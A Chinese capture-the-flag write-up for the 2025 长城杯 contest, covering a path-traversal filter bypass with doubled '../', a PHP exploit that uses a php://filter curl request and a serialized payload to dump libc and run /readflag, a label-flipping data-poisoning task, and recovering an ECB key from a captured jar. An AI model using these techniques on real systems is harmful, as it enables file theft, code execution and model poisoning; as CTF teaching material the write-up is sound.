长城杯

WEB

文曲签学

长按fn进入调试

1757814034023-738403d5-dc66-4bc9-8fe4-a0cfe4891dfc.png

提示:

flag在/flag下,可以尝试目录穿越漏洞来读取它。

会过滤“../”,可以使用双写来绕过。

文件名有大小写区分。

1757817565827-70675840-1c91-4930-8d47-ac485a73776b.png

SeRce

1

会自动去除末尾分号,导致不一致。

读 maps 和 libc。打cnext。

1
curl -X POST -d 'filetoread=php://filter/read=convert.base64-encode/resource=/usr/lib/x86_64-linux-gnu/libc.so.6' 'https:///?exp=O%3A27%3A%22%5F%5FPHP%5FIncomplete%5FClass%5FName%22%3A0%3A%7B%7D%3B' > ./log

执行:

1
/readflag > /tmp/res

在读取 /tmp/res 即可:

1
filetoread=/tmp/res

AI

easy_poison

将训练数据集的target的1和0交换 然后训练

train_set_flipped.csv

1757817764032-e76d0fd7-94c3-4bac-932b-eeb755181b79.png

数据安全

追踪tcp 1122流提取jar

1757821934435-0e4675ac-4d91-45e2-86f9-eed1445ee270.png

反编译拿到ECB密钥

1757821905683-d0c4ca1e-a2d3-4e64-b3f4-a079165df9c4.png

key:e45e329feb5d925b

提取class1757822806287-646e2a03-e548-4ea3-b843-48b5dcc4c3f9.png

flag1

1757824491695-7c7d1db8-5dca-4df5-b21e-58d9bf76e4a5.png

更新: 2025-09-14 12:35:03
原文: https://www.yuque.com/chaye-apqbl/vsc85q/mg37e4z5f64rdekb


http://example.com/2026/01/19/WP/2025/长城杯/
Author
chaye
Posted on
January 19, 2026
Licensed under